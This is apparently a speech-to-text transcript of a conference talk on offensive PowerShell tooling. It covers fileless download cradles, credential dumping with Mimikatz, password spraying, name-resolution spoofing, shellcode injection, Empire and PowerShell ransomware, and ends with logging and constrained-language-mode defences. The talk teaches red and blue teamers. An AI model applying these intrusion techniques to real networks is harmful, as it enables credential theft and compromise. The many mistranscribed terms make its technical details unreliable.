Powershell for CyberWarriors - Russel Van Tuyl

hey guys if you want to screw that there's a lot of console output you probable to see from the back save you the eyestrain or you can look at the slides later or if you don't care to see the console output there'll be a lot of console output you probably can't see from way back in the back Eric Eric especially if you're short like Eric if I want to scoot up hey guys thanks for coming out listening to me talk I'm giving this talk kind of once before at ETSU I don't know if any of you guys are from ETSU if you are if you've heard this talk before you might want to go to

the other one because you probably say heard of this talk if not I got lots of great stuff for you in store then go over a little bit about myself that's me that's my pretty picture my glamour shot spear the analyst at sword and shield I'm also remember the Tennessee Oh National Guard I'm working on my master's degree through sans got two kids just one wife right now if you want to get ahold of me this is my personal email and my Twitter handle I don't really don't use Twitter too often but feel free to email about anything that you ever want to talk about I'd be glad to answer and respond pretty open guy I

think I like to give a little bit slammer before I get started no matter how smart i think i am i don't actually know everything so if you find a technical and accuracy with what i have to say or what i've said or just let me know we can talk about it but please don't expect me perfect i wouldn't expect that of you but i'm just letting you know i could have got something wrong here's a brief outline of the things we're going to talk about today we're gonna go over a little bit a bit powershell give you a little background information and i'm gonna talk a lot about attack tools it's probably pretty heavy on the tack tools because that's

what i use on a day-to-day basis then i'm going to move into a little bit about malware a little bit about forensics tools and then i'm gonna close up with ways you can kind of block these attacks or find ways to defend them here's the definition that powershell pulled it off of a website also real quick my slides will be available in sworn shields blog afterwards and my slides have tons of notes and reference links so you can get all this content from so if i go through this stuff quickly you don't get the chance to write it down or take pictures it'll all be available later there was this a definition of powershell do we have any programmers in

who have ever programmed anything in a batch or in wrote an batch script that's script yeah we got some candy too those have written batch scripts because anyone else here you go sir it's you back there well anyways if you bring anything in a batch script before you know how awful it is especially with today's modern programming languages PowerShell is beautiful for many reasons these are the reasons why PowerShell is beautiful as you know it's Microsoft's new updated you know old dos prompt it can do a lot of things it's primarily built on the.net framework and you use it to interact with the windows API everything works off of verb noun completion so like if you want to do

something like get help you just type the words get - help you know the verb and now and what it is you want to do has tab completion that's always great especially they're coming from Linux or anything like that that has it and it's stuff in your path you could alias any command you want how many of you have ever been in a Linux command prompt and type LS oh yeah with PowerShell guess what it works it'll give because the alias the command over so you can straight up hit LS and PowerShell and it will give you a listing of what you want so you can alias any command that you want to but the most one of the good

things about PowerShell is that everything comes out on objects if you've done any object-oriented program if any sort PowerShell works and objects so you can literally craft up your own object or you can use the built-in objects that they have and you can do smart things with the data when you get an object back as opposed to the old command shell where you just get text strings on your spoon on your monitor that's all you get a PowerShell has actual structures you can build your own or use ones they got syntax highlighting is available in version 5 it looks like that with the yellow and then you'll see lots of slides later was green and gray

and all kinds of other stuff about it PowerShell has been around for a long time it came default on Vista probably probably don't know that was there and you could install it on XP if you'd wanted to but please don't use XP it's been around I think it's coming up on its 10-year anniversary here soon on how long PowerShell has been around and because that version 5 is a news release version 5 came on Windows 10 and you can upgrade your pack passive versions up to version 5 now a powershell script instant PS 1 those things are not clickable you can't double click and run a PowerShell script like you can a shell script or something

like that you actually have to run it from the command prompt Microsoft intentionally did that where you can't double click and run a script and you can set up a module like a lot better terms it's like a function or a class you can put all your other stuff in there and use the PowerShell module a power saw also comes with the integrated scripting environment so you know you can open up the IDE that as you will to mess with your PowerShell programs and one of the other cool things you can strip compile PowerShell script to exe if you want to do and distribute it out that way if you don't want people to see

your source code here's an example of the again the verb noun hears get help I got help on the command get alias and this is what it looks like with these things are called commandlets and so get help as a command line there's tons of information most people that write scripts they all document really well so gone are the days where you don't have to can't figure out what's going on how you run a tool most powershell commandlets are pretty good with that let's see you can pipe the data structures around that's what I was doing here I did a get process which got me a list of all the processes and then I piped it to a command that called get

member get members really nice because if you ever have an object you know migrate I got an object now what am I gonna do with this thing well get member tells you that this object has methods and properties and aliases and events and all kinds of stuff so you can figure out how these are going to use this object for what it is you're gonna do with it and just limit it to ten ten items some of the good use cases for PowerShell again I always like us early it's its integrated in Windows it's everyone's using it for everything in fact if you get Server 2016 Nano I believe it is it has no GUI you just

have to interact with a PowerShell only that's one of the ways to do and you do that through PS remoting which is like SSH for like about turns but it's a way does their own stuff and you can with PS Ramona you can run one command across your whole network from one workstation but that wasn't good enough for you Microsoft's participating in the OpenSSH project and they said they're gonna have OpenSSH integration here soon and then antivirus uses it actually malware writers use it right team people use it one of the better things about it has in-memory code execution which I'll touch on here a minute here's an example of PS remoting like I said I got a lot

of screenshots I had a laptop that was going to use and I was gonna show you guys some stuff on the VMS except for my laptops like 20 years old it only has VGA output and my boss won't buy me a new one so I had to use the had to use their slide deck which is an example of PSR voting's to another computer it's like youth an SSH I was just connected to another computer over there and you can see once you remote over to the computer it puts out the hostname up they say you know which computer it is you're connected in there's four ways to load scripts or to use the scripts in PowerShell the top

one actually saw there's three ways the top ones the execution policy any of you guys heard of the power saw execution policy not too many idea people think that it's a security boundary because if it's set to signed only then they think that you can't run their PowerShell scripts to try and run one the very first time I computer and I'll say that you can't run it because you're not authorized so you change the execution policy to unrestricted or assigned or whatever but that can be changed by anybody and that wasn't good enough or you can just tell it hey let's bypass the security policy for now in PowerShell let you do that you can just continue on but one of the

ways is you can import a module with the import module clan there's an example in the import module or you can use dot sourcing which is just a dot and in the path to the extra powershell script and we'll pull it all into memory and that in that session you have there there's one other way a real popular way amongst attackers anybody happen to know what the other way is no well you don't know cuz I'm going to show you its the IEX download cradle this thing is very important for you to pay attention to you'll see this used over and over and over and over and over and over everywhere in all my slides IEX is a

short alias for invoke expression and what this does is it creates a web object and then it downloads your power of the shell script from wherever you can download it from the internet you can download it from another machine you can download from SMB you can you and then it pulls onto memory so like this PowerShell script right here and any militia malicious ones that I have they never touch the disk i from a powershell session I'll go out to the internet I'll grab the script that I want pull in the memory forensically there's nothing on the computer for you to know that there'll be nothing for you to know that I pulled that script in there and here's

an example of me pulling the script down and then executing the details on there here's some of the tools that I'm gonna go over the list looks quite longer and as I started building my presentation I didn't have enough time to get it all in there push you probably want to say it for three hours so I took some of the tools off but these are the kind of the attack tools that I'm gonna go over how many guys have heard of me me cats me me cats is a really great tool I'll show you a little bit more about that later this one I hear is called power memory of you that are familiar with me me cats

does anybody know what version of Windows it won't work in by default no no well Microsoft put some protections in place and Server 2012 and Windows 10 and 8.1 that keep me and cats from running you can't make a registry change and reboot the machine but anyways this program I hear a power memory it does a lot of things but the primary use case for it is for getting a dump of alsace which stores those credentials in it and it'll work on all the way to Windows 10 it doesn't care what your operating system is it will grab you can grab a clear text credentials out of memory from any computer one of the ways it

does is that use Windows signed binaries so there's again no no other tools on the disk that are kind of weird you just use straight up Microsoft tools and you've got a copy of the memory here's an example over here this is the main screen when you run a tool up and then this one over to the right over here was me extracting the memory from my my own computer was a Windows 10 computer there's kind of the steps that it went through that notice down towards the bottom s if I want exfiltrate data you can have it send your stuff to paste in if you want so that way you can have set up a private repo so that was not open

to the public but it'll just exfiltrate it straight out for you and there's an example there's my password don't don't use it please that's my super strong but this again was on a Windows 10 computer and this is what it looks like I forgot to mention earlier all the tools that I'm talking about the light grey text underneath the tool name has the tool author the Twitter handle up I knew it and a place where you can get the tool if you wanted to use it trying to give attribution where it's due to all the people that wrote these tools another set of tools is called a PowerShell ad recon Shedden Shawn Metcalf he's really being in the PowerShell space he

actually gave a talk very similar this one recently but he develops a lot of tools as well but this tool set is used for interacting with Active Directory like the title says in gathering information and some of the other some of the scripts of note are the discover of interesting services and exchange server and the sequel server of you that work with Active Directory are you familiar with SPN the service principle name you can ask a domain controller for its available services without actually running an nmap scan on the network you just tell the domain control hey tell me where all your sequel servers are and it will answer you back with that you don't

have to do any nmap scan or whatever so these tools are good for that here's an example of top-tier in my lab network mat we're talking about Skynet taken over I'm on my way to make that happen dinette set up at work but this one up here again I asked the domain controller with this tool tell me where the sequel servers are and this one down here in the bottom right hand corner I said tell me where the service accounts are the service accounts are of special note because typically on network people will set their user accounts to change the passwords regularly but they won't change their service accounts and then do another attack that I don't really go

into detail here I can grab a Kerberos ticket from all the service accounts and then just go to town cracking them and if it takes me two months that's cool because your password still going to be the same however long it takes me to crack it but I can use Kerberos to grab a ticket and then crack the password of the service account it will take longer and then use it later so that's why that one is interesting finding all those service accounts on the network so I know what the target next if you ever made your way to another computer and you needed some tools that weren't there again you can use the FTP without having

to download a client you can just use this powershell ftp script here's an example up here of me setting up the connection and then I just made the connection over you know these things come in handy if you're trying to exfiltrate data and get things off the network or from another NOAA computer

the ideas internal power PowerShell module those things are great as well this guy has wrote a ton of functionality and his tool set PowerShell version 5 also comes with the way you guys familiar with the apt packet manager or the yum packet manager in Linux Windows PowerShell version 5 has something very similar one option is called new gate Machamer with the other ones called that you can straight up say import das internals module a camera with actual command but you can it'll go out to the repository and get it from the command line just kind of like app does it doesn't actually you don't have to download and install any of that kind of stuff that's a PowerShell version but

anyways these are some of the scripts that he has the functionality in there and I'm again with over a couple screenshots on them but notice up on the upper right corner talks about converting hashes if you need to know a you know a password and you want to try and pass the hash across the net where you can go give it you know the clear text password and then create the hash so that you could pass it around but one of my favorites I love the MTD s that bit file I'm not sure if you guys know you most talked about it actually David you talked about it earlier in your home lab about how you extricated with with

crack map here is another way to do it with a PowerShell only tool first you got to get a copy that's this key and then you add that to an object and PowerShell and then you come down here and you just use this tool from the DEA's internal suite and it will extract all the all the stuff NTDs zip file it actually gives you back an object that contains all the information about the user I didn't show here because it's really long so there's a lot of information associated with the user but some of those things have no or comments that are typed in about the user or let's say they're past ten password hashes are in there so again you get

back an object out of PowerShell you can do something with you can automate an script and do lots of things with it after that this one down here also after I pulled everything out of the Dead file with this module it has a nice other script we'll give it out to an hash cap format so you can send it straight to your cracker without it has one for John John the Ripper is so that was comes in handy you know it's like right now if you use any of the other tools you had to kind of format your text file for whichever password cracker you're gonna use but this one has it built right into the pipe to

object to it and they'll spit it on the formatting it another great tool is called dark observer it has a ton of functionality I'm not gonna go over all of it you can see I try to list it all here so you can see but it's great for basically once you get on a box in a network you can just start enumerate about the network you want to find sensitive files so there you go Network shares can do a pink sweep looks like it'll do virustotal hash analysis the nice thing about this is someone wrote in all PowerShell functionality how to do all these things so you don't need to again put custom binaries PowerShell is technically a script

language so again you just pull these scripts down that do all kinds of stuff for you and I'm just showing you the functionality you get with it and then when you get access to a remote machine for me because I'm an attacker my tools aren't necessarily on the computer that compromised and historically you'll you you might upload your own binaries and when you do they'll get flagged by AV and then you'll lose but this method you know you don't have to worry about that connect your computer use PowerShell then download my tool in memory and you the computers on the wiser that my tools that's they're doing its thing and you guys I hear you use OWA or familiar with

owh owh great for us when we're doing external assessments because it provides an interface to one act or interact with Active Directory because they're typically using Active Directory creds and it's a good way to do password spring anybody know what password spring is brute-forcing is where you do one user can't with multiple passwords over and over password spring is the inverse of I know all the user accounts and I just try one password across all of them so if I use something like the harvester or anything else to scrape your organization's email accounts I now have a full list of user names and I could take that set of user names I can use something like this OWA toolkit and I

can launch a brute force attack against all the user names with one password a good one right now would be something like or 2016 that's guaranteed to give me at least one hit and that's frankly all we need is just one connection after that and if that wasn't good enough for you you can also again this is all from external from internet this isn't required to be local in the network for this tool I can use it to download a copy of your address book the gal the global address list off your email server but once I have valid creds that have to Cobell creds first but this is a good tool for that here's some of the

other modules that it has in there you can you can use this PowerShell script to just strip write a message you can see that last command down at the bottom I can write email from PowerShell and just turn on send it out after that anybody know what the Swiss Army knife of network security is netcat yeah well someone put it in PowerShell which is great again net cats a binary I'm not to put on your box this isn't a binary I don't have to again who's the I yet to download string I was talking about earlier get connect to your computer I don't have my tools out there so what do i do I just download it from the

internet this woman I actually had on a local computer but you can give it wherever it's at download it it's in memory then you can use it so what I did here was set up a bind show listening and it was gonna give back PowerShell afterwards and there's an example connected with the netcat on my attacker machine over to that barn shell and as you notice I got the PowerShell terminal right off the bat so that's always nice as well

and you guys say my talk last year on w pad or NetBIOS spoofing honestly offs my favorite way to attack a network i used to roll into a network and do a vulnerability assessment first now i'd know i just go in and start spoofing names and collecting hashes right off the bat i don't even waste my time trying to find other vulnerabilities but i use the tool called python responder which david also talked about in his talk it's a great tool i love using it this is that packed with like python responder but this is written in powershell it's called in bay and it does the same thing it listens on the network for NetBIOS traffic or

link-local multicast name resolution traffic and it's spoofs to it and then people will send back their hashes and then you can start trying to crack the password hashes from there again this is great especially for trying to pivot compromised a machine in the DMZ I don't want to upload my own tools I can't run Python responder on that domain controller that I just got to so instead I will just upload this with the i-x download cradle in the memory and I will run my own net by a spoofer straight from that computer instead down here is a example of me capturing two HTTP ntlm hashes coming back I'd have to crack them but trust me

typically always be at least one password it can we only need one to kind of go on alright power tools this is this is one my favorite I got a secret man crush on will shoulder he wrote a lot of the tools that I talked about he's one of my favorite guys when it comes to PowerShell especially offensive tool tools power tools has all of these tools in it I personally have not used the pewpewpew or the power breech I have used power pick power pick is I think it's a c-sharp but it might be see if it says on there now it's either C sharp received plus plus but it's a way to execute power shell in a compiled

language like C sharp and it doesn't it's not you it's not a tool you can actually download it run you'll have to download it into the visual studio and use it to compile your code stuff but it's a way to run PowerShell commands from executable power up again Andrew sniffs and my coworker he's gonna talk on press collation across the way power up does that it's a one powershell script again he's IX down low cradle on commas compromise the machine pull it down it does all the privilege escalation checks for you checks for unquoted service paths and places that you can write to and service that you can change and it gives you a nice

little report when you're done so gone are the days oh I have to manually go through and do a process list and see well the service paths are and see if I can change any of them just run this powerup script and will tell me my methods for being able to privilege my privileges and to top that off it'll tell you where it's done and then you can just run another command let's it actually do it for you so it'll say this service has a unquoted service path and if you run this command it will go ahead and replace that command with your own service path and you're buying air and you're good to go but my all-time

favorite is Power View if I've ever worked with any of you before you'll thing we talked about power of you power for you is Power View is a beautiful tool and I'm about to show you why this can actually be used by blue teamers on a network I think there's a practical application for that as well but I've typically use it as red teamer so the kind of the layout that I did here was the boulder the bull text is like the category and the below are some of the functions in that category the number indicates the total number of modules I don't want to list them all out here I just want to kind of highlight some of

the better ones I'll get into some screenshots here to actually show them I knew that as you can see there's a ton of functionality going on in here one of our particular favorite ones is user hunting which I'll get into in a second all right here's an example of Power View Power View does require to me to have one set of ballad user domain so typically when I start an engagement I connect my computer to your network and I have no I'm not a domain joined machine I don't have any domain user accounts I don't have like that so then I'll do stuff like the W pad or the N Bay is some broadcast spoofing get some hashes back crack one

and then all these commands that you'll see run in Power View can be any normal user they don't have to be admin user none of the such just a normal user account works to do everything and essentially what it's doing in the background is it's asking Active Directory a ton of questions and it puts it into powerful objects that you can do stuff with so for this one I want to know the domain Sid which is probably pretty boring but if you ever wanted to brute-force the domain admin account and they happen to have changed a username from administrator to something else this is how you can find out what it is the administrator account on every

computer ends with a writ or relative identifier and it says the number is anybody know what that number is that all administrators in 10500 that's right so I got the domain Sid I put - 500 on and I found out well on this domain the domain administrators name is super admin not admin so that was handy for me to use a Power View began from a normal user over here I wanted to find out stuff about users so I just sent a query over and ad told me all this stuff what's interesting here is you notice I asked for the description field that's an active directory if you look down here there's a bunch of passwords some

smart guy put all the passwords in the description comments and active directory you'd laugh and say nobody would ever do that but they do I mean I did this for my lab environment but you'll be surprised what you can find scraping the comments sections of Active Directory user objects to see what kind of information you can get back if you don't get password you can get tons of other useful information at the very least again here's just a user object back of the super admin you can see there's tons and tons of stuff on there about it for this particular engagement I wanted to know where the enterprise admins are you know domain admin enterprises I mean that's the place I

want to be so I was like I don't know who who's in the enterprise admin so again I use Power View from a non domain computer with a normal user account to find out who the enterprise admins were that's who they were you can get some stuff about the gpo's or the domain policy as the top tells me the password policy it allows me to do smart group forcings if I know your password policy seven characters and complexities turned off then I won't waste my time trying complex passwords I'll probably try the password password and I'll probably work down here I get GPL information sometimes people save passwords and GPOs that's a nice place to look well the way the GPO is used to

work Microsoft has fix it now where you can't do it but you used to be able to push the GPO that would set a local admin password and it was want to say encrypted I don't think it was encoded I'm pretty sure was encrypted but then the key got put out for it so that way anybody can decrypt the user the password from a GPO anyways so I found out who the enterprise admins were and I want to know where they're logged in at so then I use this part of Power View called a VOC user hunter and it will if you don't be to any flags will automate to tell you where all the domain admins

logged in I want to know which computers the domain admins are logged into so that way I can try and break into that computer because that's where I want to be wherever the domain admins are but that doesn't work if you got a buddy who's on the network somewhere and you want to know where he's logged in that and his IP address run this and book use 100 give it the username flag and it will tell you where they're logged in it

on to the next toolkit this one's called power sploit again same same thing with the module category and some modules that are in it it does a lot of neat stuff in here it's more of an attack tool you can do lots of cool things with that this tool power split actually holds what's called an oak Mimi cats it is a powershell implementation of mini cats so that way i can again run mimi cats on your computer without downloading any binaries onto your box i can just nail it in the memory of the i-x cradle the power tools that I talked about before the Power View and power up there now part of the power sploit

project that I started using them before they kind of merged and I still think of them as separate and I want to talk about them separate cuz I like Power View a lot but they're not actually part of this project I typically do a demo but this is an example of me creating shell code I just use the MSF venom and I created myself Windows payload that executed to open the calculator it's this cool thing that you do getting out here is that's the shell code then I got I got the name of a process I was looking for a process to inject my shell code into so I just asked for use PowerShell got the name with explore

process and using the invoke shell code which is part of how our spike I gave it basically at the process that I want to inject into and then all the shell code that I wanted to inject into and then using power spiders and checked with my shell code straight into another process on a box again all the memory all done through PowerShell no binaries touching the disk nothing as such what's that yeah oh yeah the Sun here do you wish to carry out your evil plans which is pretty funny I didn't mention this earlier PowerShell can take encoded and compressed commands so if you wanted to encode what you're gonna execute power shell for a little bit of application

you can take this thing up here I got the IEX download cradle and then I just used this power sploit module to encode it all this stuff you see here should be a bunch of base64 of the encoded command that I want to run and you can quite literally down at the bottom you see right here I ran PowerShell - II four encoded command and then my base64 string and it executes the command after when it's great for obfuscation so you don't know what I'm doing on your computer you just if you ever see me run that for some reason you happen to see it you would just see a bunch of base64 string now here's an example of a

keylogger from that module see you can use power sploit to do port scans again I connect to a computer I don't have any my tools there can't exactly install nmap on your computer but I can download this power sploit module in the memory and then do a port scan on your network from there using PowerShell only and again what's nice about it is it gives you back data objects so what you see down here at the bottom part is a data object with with certain things about it and I what I did over towards and where it says where object alive equals true I basically said only give me back the objects where the host was alive I don't

want the other objects back but again you can programmatically handle this data when you do a port scan and do lots of things because you have back actual data objects you can do something with here's invoke mimikatz I was talking about if you guys haven't seen it before it's great graphs clear text passwords out of memory no matter how strong they are they can be a 30 character password it'll grab it straight out of memory here's an example that running I use the short URL because I if you type the full path but the invoke mimikatz script is available and github public so you can just pull it from there every time you want to use it you don't have to host it

yourself anywhere just pull it straight from their github repo every time and then run on the computer last year I gave a miw pad talk I talked about it quickly I just thought I'd noted again using that PowerShell functionality I was able to do a big old PS exec loop in PowerShell and I just basically sprayed the whole network with this loop and it down so I connected to every computer on the domain I ran a PowerShell command that downloaded me me cats into memory got the password out and sent it to my SMB server and I did that on like 200 computers on our network all using PowerShell and beau communicates never touched a disk on a computer so

forensically you don't know that Iran Navy cats on your computer just take this example that running I wrote a parser to handle 200 output now there's an example of it running nice thing is another another great tool set I don't spend much time work this one not for any particular reason and and I find the tool sets I need and all other things but nickel middle I think that's how you say his name he provides a lot of training on PowerShell - he's really prominent in the PowerShell space on his tool development same thing with the functionality group and some tools going on down here you can do lots of neat things there's some more modules on it

one of the nice things down here you got this one um invoke mimikatz WGCI great earlier I told you that on Windows 8.1 and up and Windows Server 2012 you can't grab credentials out of memory you gotta do what's called a debbie digest downgrade we go set a registry setting and tell windows to keep store in the password of memory it's built in this tool you can just run it and no one do it for you the show target screen is nice this guy wrote a PowerShell script that will stream somebody's desktop over with MPEG across the network so you know screenshots are cool but I can stream your whole desktop like a movie using

this thing I'm gonna sit there and watch you the whole time as opposed to just taking a screenshot screenshot screenshot I can just stream it over the network and he's written a blog post on how to do it again that's in my my slides here's example of me running one of his scripts windows is very nice and it will store your password for all the Wi-Fi networks that you've ever connected to I don't know how many of you have your laptop for a couple of years but you can run this script on your victim and you can get all the Wi-Fi passwords for all the networks they ever connect to here's an example of me getting out the

password to my iPhone Wi-Fi network so when I tether my laptop to my thing I ran this script on my Windows computer pulled out the Wi-Fi password that's great especially if I catch you at Starbucks a compromiser machine and I would like your corporate machine or your corporate networks Wi-Fi password I can grab all the new information from one place PowerShell suite yet another set of tools the two main ones I'll talk about here are invoke run ads and subvert PE earlier I talked about how I just need one set of valid user credentials even though I'm not the part of the domain join machine I use a program called run ass to do that it allows me to

impersonate and network user and give it the username password and whenever I run a command it runs it as that user just like the things called but if you ever find your place in a company where they were trying to up the security and removed run as like Exe from a computer that's all right somebody wrote in PowerShell you can just use this PowerShell run as to do all in PowerShell or if you'd like to run all your tools from PowerShell without using the binary at all just pull this thing down here's an example of me doing it again using the i-x download cradle that I talked about over and over and over what's interesting this time I used SMB

connection I'm pretty sure it will take any URI I haven't only tried HTTP and SMB I haven't tried any other URI but you don't even have to connect over HTTP if some reason to have a web proxy but they let for for out over four for five out over the network you can just make an SMB connection instead you don't need to make HTTP that's the example of me spawning a new shell is a different user subvert PE is really nice there's this thing called code caves when someone compiles a program there's empty space in there for various reasons subvert the subvert PE will go through find a nice place and I'll put your shell code right

in that and that and that program will continue to run after the fact so you can basically backdoor whatever executables that you want to and you can use this PowerShell script to do it so I told subvert PE the path I wanted to backdoor the notepad dot notepad plus plus DX e and then so I told it where the XE was and it found a code cave and it put put my shell code in there actually it's a default with its own and just opens calculator but you can go in and change the shell code to whatever you want it to actually be I

didn't have a screenshot of it but basically once after you run this and you double click on notepad Exe it'll spawn whatever program you told it to you in this case that would open up a calc on top of that but if if you don't have PowerShell exe on your computer or you happen to have been administrator you block the use of PowerShell DXE that's no problem there's plenty of tools around that and you guys been on network that block cmd.exe before no I have I been on somewhere they won't allow you to run CMD that you see but you can run PowerShell I actually I don't know why it doesn't make any sense power so you

can do lots more stuff with but if they have application whitelisting and that you can't use PowerShell bat exe at all that's no problem this guy right here Jarrid height he wrote a tool called PS attack not only does it run PowerShell commands without powershell exe this guy has taken all the tools that i previously talked to you about and he crammed him into this compiled binary to make it even better than that he's encrypted all the modules when it's stored on disk when it's saved there and when you double-click the program and run it he loads those encrypted modules into memory and then decrypt them that makes it really hard for antivirus to tell what's going on because although if

it was gonna flag on some PowerShell module based off the text of it it's not gonna know because about time it gets decrypted it's already in memory so there's there's some of the tool list that he has over there power sploit power tools nice sharing power cat in bed just like all the tools I was just telling you about he has a mall compiled in this one binary you just run on your computer and you're good to go and it does it does tons of other stuff on top of that if that was a good enough for you guy named Benton he's also very prominent in the PowerShell space he wrote a tool called not PowerShell it's just the exe

and it runs PowerShell commands for you the one thing to know about parish are earlier when we first started talking I was talking about how it works with dotnet PowerShell is really just an interface that deals with the common language interface that dotnet uses so if you take away PowerShell that you see that's no problem somebody will just write their own tool that talks straight to that common language interface and this is the node tool it does that here's an example of me just using again the i-x download cradle without PowerShell downloading power view and then finding out where the domain controller was that was I use that for not to step it up here a little by

remote access tools here's one called posh rap by Casey Smith these are some of the functionalities but you can basically use to set up a web server and then you can see the connect web shells back and forth I don't use it too often but again you should use the i-x download cradle to get yourself remote access to a computer Metasploit has a ton of functionality for PowerShell these are some of the modules that are listed in there I know it's a lot I'm not gonna move on to the next sexual where I show you some images you can set up a reverse powershell payload this is kind of how that's set up but one of the

better things that to note about PowerShell is they recently added a PowerShell extension so you can actually have a fully native PowerShell shell inside of your meterpreter session before you could run PowerShell command but it wouldn't let you do anything after that I wouldn't give back feedback now you got just like you have PowerShell at your fingertips through meterpreter so here's an example of me loading PowerShell then I imported my own tool again I had a matter Pro access I in downloaded power view script and then I ran a command and tell me where the domain was they've also exposed some of the mature protection ality as.net namespaces so you can interact with it that's kind of what's going on here I

basically use this is a dotnet namespace to use that to run me me cats through meterpreter but one of the more popular things is called web delivery again Andrew Smith who's across the way he wrote he was a co-author on this particular power particular Metasploit module you basically go when you set up a Metasploit and then you get this command back up here it's PowerShell the knop stands for no profile the dash W is hidden hide the windows so nobody sees it and then the dash C has run this command so what I do is I connect to a computer and I just run this command and it gives me back on meterpreter shell right back on the computer again it uses

the IX download cradle to make a connection back to Metasploit and get that motor power running in memory on the other box I don't really have a demo I was just kidding Empire again written by that guy that I was talking about will Schroeder and a couple other people but what's unique about Empire is that it is a powershell only agent that stays in memory so again it all runs in PowerShell it's like meterpreter has like motor prototype functionality but it runs all in PowerShell all in memory on the target computer now you got yet to setup persistence for that you can configure just like with Metasploit the timeout for the connection so you can say hey if

you can't reach the server for six weeks then you can die or you can set it for two days you can set it for whatever you want to but you can keep trying for as long as it wants but if you reboot the computer you'll lose because it's in memory you'll lose it some of the ways to use Empire power empire is a PowerShell interface that connects to the Empire server again talking about PowerShell tool the Empire has a REST API these are some of the functions that it has there's an example of me connecting back to my PowerShell sorry my Empire server getting back information about the agents I have another web interface is called

PowerShell Empire web this one's actually written in PHP it's not part it's not a PowerShell implementation alright talk with some malware how many you guys went to Aaron Lancaster's talked earlier heard about some ransomware w-well PowerShell they did the same thing that happens in PowerShell looks like I'm little run with the hole in time so I kind of give you this short and skinny on PowerShell PowerShell malware comes through mostly through infected word documents that runs a visual basic code not visual at VBA code that will launch a PowerShell session and guess what it uses it uses the i-x download cradle when you have macros enabling your word documents to execute and deal with what it needs to do after

that this particular one use PowerShell and then it would go in fact all your other Word documents so when you spread them around it would just keep going this one came through a malicious link as an attachment but if you see down here here's the code they were running again they bypassed execution policy and then they use the i-x download string to download the code right after that power snip is a different set of malware running through a campaign again it downloads its shell code you can actually download into memory DLL files as well and execute those on top of normal PowerShell stuff but again right down here it is using the i-x download cradle

here's another set this one kind of persisted in memory can't remember anything else unique about this one anyways PowerShell it does the PowerShell malware it does the same thing it's just a different way to execute code on the Box the tip that comes an infected Word document one thing to note this one actually came with infected PDF documents as well there's a way that you can run code on a Windows box through a function and PDF so it's not just limited to Windows Doc's this one is actually ransomware they use this power shell game with the i-x download cradle but this time the PowerShell actually does the encrypting of the file itself so it doesn't use

some other functionality again what's unique about it forensically there's nothing on disk for you to go back and look at to see what happened it'll just sit there and start locking up your files for you encrypting and then throw up this message saying it wants money Konza is a Incident Response framework I know you see a bunch of stuff on the side of screen it probably doesn't mean nothing what it pretty much does is it will remotely connect to any computer and it will grab all the files you would normally grab as an incident response person and it will pull it back for you you kind of configure that if you have a certain way that you grab files when you

do forensics discovery or forensics response and that's what kind of what's going on here it's grabbing a buncha logs a bunch of configuration settings Auto runs all that kind of stuff it grabs all the data it sticks into the objects again you can do powerful things with what data objects and you can go operate on them to do other things after that power forensics is yet another tool you can grab some stuff about the Boot Record with his or the NTFS filesystem he has a lot of neat stuff on here but I like the bottom one on the right hand corner it invokes forensics dd pretty sure it just makes like a DD image of a

hard drive across the network PowerShell arsenal is for reverse engineering again another tool set it has a bunch of functionality that you can use again the tools are in power so you can use it to do reverse engineering with that

all right a little bit of Defense yeah I told you a lot about a lot of ways to get owned in a lot of ways to have fun but one of the ways you can work with PowerShell to kind of stop attacks is to up your logging I recommend everybody upgrade any computer that have the PowerShell version 5 again Windows 10 and comes with it by default but you can upgrade Windows 7 up to PowerShell version 5 as well and the reason for that is because it has extended PowerShell logging in it before you would just see that someone ran PowerShell but if I use the encoded command you wouldn't know what I ran PowerShell version 5 has the ability to

do script block logging so that long string of code that I showed you is all base64 stuff it'll actually show you the D abuse kata code in the log system so if you pipe those logs to something like Splunk and then you can turn around you can actually see what's going on now you can see the code that's being executed on a computer so if somebody on your network use the IX download string download cradle and download other malware and you're checking your logs you can see that they actually did that and it also has system-wide transcription so like you can record on every computer on your entire domain or just specific ones of high value every

parish of command that's entered from the terminal save it into a logging file just kind of like linux shell logging this is the ankle of me again creating some encoded command this is what it looked like again it's just a bunch of base64 string all that was to set up this when I executed the command on the system when I executed it with the base 64 encoded stream this is what gets stored in the log you can actually see down here it's that it's the actual clear text of the string it's not that long base64 encoded string that you didn't know what I was talking about so you can you can do basics before can you

can XOR it you can rot13 and you can compress it on top of that but when it goes to the log file it do you have to use gates it

PowerShell has this thing called cos strain language mode and it's probably the most powerful way to stop people from using PowerShell in nefarious ways there's many many language modes but the one I wanna talk to you about today is called constrain language mode again I've told you before the PowerShell is primarily interacting with dotnet when you configure your PowerShell to operate and constrain the language mode you can no longer interact with the dotnet service anymore you're also not allowed to interact with win32 API s and you can't interact with calm objects anymore so pretty much neuters powershell you can't do much of anything with it now you can set it through an environment variable which I show here we could push

it out with the GPO but if you have local admin on the box you can just turn around and reset it back but if it's a normal user and they don't have admin rights and you didn't give them local admin please don't do that please don't give people local admin then they'll be stuck with that environment variable and they won't be allowed their PowerShell will be stuck in constraint language mode but if you have a blocker deployed on your network AppLocker can when configured in allow mode so whitelist mode it will treat all powershell script as constrained language mode and and even if somebody is a local admin they can't set they can't change that

particular control of a blocker first so if it's in tandem with a blocker and you have constraint language mode set because you're using allow only mode then attackers will have a hard time executing code on your box here's an example of that I did I checked this top one is me checking my language mode I said I had full language mode and then below it I set the environment variable so that would be put in constrained language mode I had to open up a new window because it was a new environment and then I checked my language mode again you see here it says I make a strand language mode and then I tried to

use that beautiful IEX download cradle I talked about and it didn't work it wouldn't do anything because because the PowerShell language was constrained I can get some other way go find ie about the box or something now ie X is just shorthand for invoke expression so it's just another command-line PowerShell right yeah it's just it's just running a different PowerShell command that I don't personally know how IX works in the background but I'm willing to bet that interacts with dotnet and that functionalities are moved yeah yeah these additional resources I think if chance to talk about it but WMI is kind of like becoming a really popular thing and what's neat about WMI is you can use it to execute power shell

code as well one of the malware is I didn't stop and talk about what actually executes it's PowerShell code through W mine these are some tools and some reports on W my tools that you can use but I didn't talk about in this presentation all right that's it you guys any questions I know it's really it's just meant to scratch the surface and just get you in touch with some of the PowerShell attack tools and defense tools and all that kind of stuff if anyone's got any questions I think you can set the language mode all the way back as far as three but I know you leaves me in version 4.5 or five to work

